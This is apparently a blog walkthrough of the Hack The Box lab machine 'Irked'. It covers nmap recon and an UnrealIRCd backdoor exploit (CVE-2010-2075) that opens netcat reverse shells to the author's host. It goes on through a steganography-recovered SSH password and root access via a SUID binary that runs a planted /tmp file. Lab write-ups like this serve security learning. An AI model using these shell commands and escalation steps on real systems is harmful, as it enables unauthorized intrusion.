Posted on by

HTB: Irked

Details

This machine is Irked from Hack The Box

Recon Phase

root@kali:~# nmap -sV 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.65 seconds

Shell Hunting

So I went to http://10.10.10.117 in browser

Screenshot 1

I hadn't seen anything about IRC on nmap, so I ran some more

root@kali:~# nmap -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.034s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
36418/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.63 seconds

3 IRC servers, I began to inspect them, connecting to the port 6697 one using hexchat to get the version

Screenshot 2

This version is know to be vulnerable to CVE-2010-2075 (https://github.com/Jack-Barradell/exploits/blob/master/CVE-2010-2075/cve-2010-2075.py) so I implemented the exploit and setup a listener

root@kali:~# nc -nlvp 4444

Then ran my exploit

root@kali:~# python3 cve-2010-2075.py -t 10.10.10.117 -p 65534 -c "nc 10.10.14.16 4444 -e /bin/bash"
[+] Setting up exploit
[+] Received :irked.htb NOTICE AUTH :*** Looking up your hostname...
[+] Payload sent, command may take a few seconds to execute

Back in my listener

connect to [10.10.14.16] from (UNKNOWN) [10.10.10.117] 38118

It connected back, instantly, but the problem was it closed. So I changed tactic, instead of a direct reverse shell, I setup a reverse shell file I could trigger

root@kali:~# nc -nvlp 4444
root@kali:~# python3 cve-2010-2075.py -t 10.10.10.117 -p 65534 -c "echo 'nc -e /bin/bash 10.10.14.16 4444' > /tmp/jackshell && chmod +x /tmp/jackshell && /tmp/jackshell"
[+] Setting up exploit
[+] Received :irked.htb NOTICE AUTH :*** Looking up your hostname...
[+] Payload sent, command may take a few seconds to execute

And this time

connect to [10.10.14.16] from (UNKNOWN) [10.10.10.117] 38123

It didn't close

$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Root Hunting

A better shell was in order

$ python -c "import pty;pty.spawn('/bin/bash')"
ircd@irked:~/Unreal3.2$

And then it was time to dig

ircd@irked:~/Unreal3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
geoclue:x:110:119::/var/lib/geoclue:/bin/false
pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
saned:x:115:124::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh

So I looked for user in /home/djmardov

ircd@irked:~/Unreal3.2$ cd /home/djmardov
ircd@irked:/home/djmardov$ ls -la
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 .
drwxr-xr-x  4 root     root     4096 May 14  2018 ..
lrwxrwxrwx  1 root     root        9 Nov  3 04:26 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 May 15  2018 .cache
drwx------ 15 djmardov djmardov 4096 May 15  2018 .config
drwx------  3 djmardov djmardov 4096 May 11  2018 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 Documents
drwxr-xr-x  2 djmardov djmardov 4096 May 14  2018 Downloads
drwx------  3 djmardov djmardov 4096 Nov  3 04:40 .gconf
drwx------  2 djmardov djmardov 4096 May 15  2018 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3 04:40 .ICEauthority
drwx------  3 djmardov djmardov 4096 May 11  2018 .local
drwx------  4 djmardov djmardov 4096 May 11  2018 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Music
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Public
drwx------  2 djmardov djmardov 4096 May 11  2018 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Templates
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Videos

But it wasn't there, so I dug into it a bit

ircd@irked:/home/djmardov$ cd Documents
ircd@irked:/home/djmardov/Documents$ ls -la
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

I can't read it, but can read the backup file

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

So I got stumped here for a while, but then I remembered the web server had an image, so I downloaded it

root@kali:~# wget http://10.10.10.117/irked.jpg
--2019-01-17 13:54:14--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’
irked.jpg           100%[===================>]  33.88K  --.-KB/s    in 0.04s
2019-01-17 13:54:14 (894 KB/s) - ‘irked.jpg’ saved [34697/34697]

And took a look at it

root@kali:~# strings irked.jpg
JFIF
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
    #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
[SNIP]

This seems like steghide, so I took the rest of the hint from the backup as the key

root@kali:~# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".

And took a look

root@kali:~# cat pass.txt
Kab6h+m+bbp2J:HG

And tried it on ssh

root@kali:~# ssh djmardov@10.10.10.117
djmardov@irked:~$

I can now read the user flag

djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls -la
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
djmardov@irked:~/Documents$ cat user.txt
[REDACTED]

Now onto root. I began to hunt

djmardov@irked:~/Documents$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/bin/viewuser
[SNIP]

I test ran the program that caught my eye

djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-01-17 13:02 (:0)
djmardov pts/1        2019-01-17 14:06 (10.10.14.16)
sh: 1: /tmp/listusers: not found

Seems to be looking for a file in tmp, so I put one there myself

djmardov@irked:~$ echo "/bin/sh" > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers

Then ran it

djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-01-17 13:02 (:0)
djmardov pts/1        2019-01-17 14:06 (10.10.14.16)
#

A shell popped

# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

Now for my flag

# cd /root
# ls -la
drwx------  2 root root 4096 Nov  3 04:25 .
drwxr-xr-x 21 root root 4096 May 15  2018 ..
lrwxrwxrwx  1 root root    9 Nov  3 04:25 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root   12 Nov  3 04:43 .nano_history
-rw-r--r--  1 root root   17 May 14  2018 pass.txt
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-------  1 root root   33 May 15  2018 root.txt
# cat root.txt
[REDACTED]

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.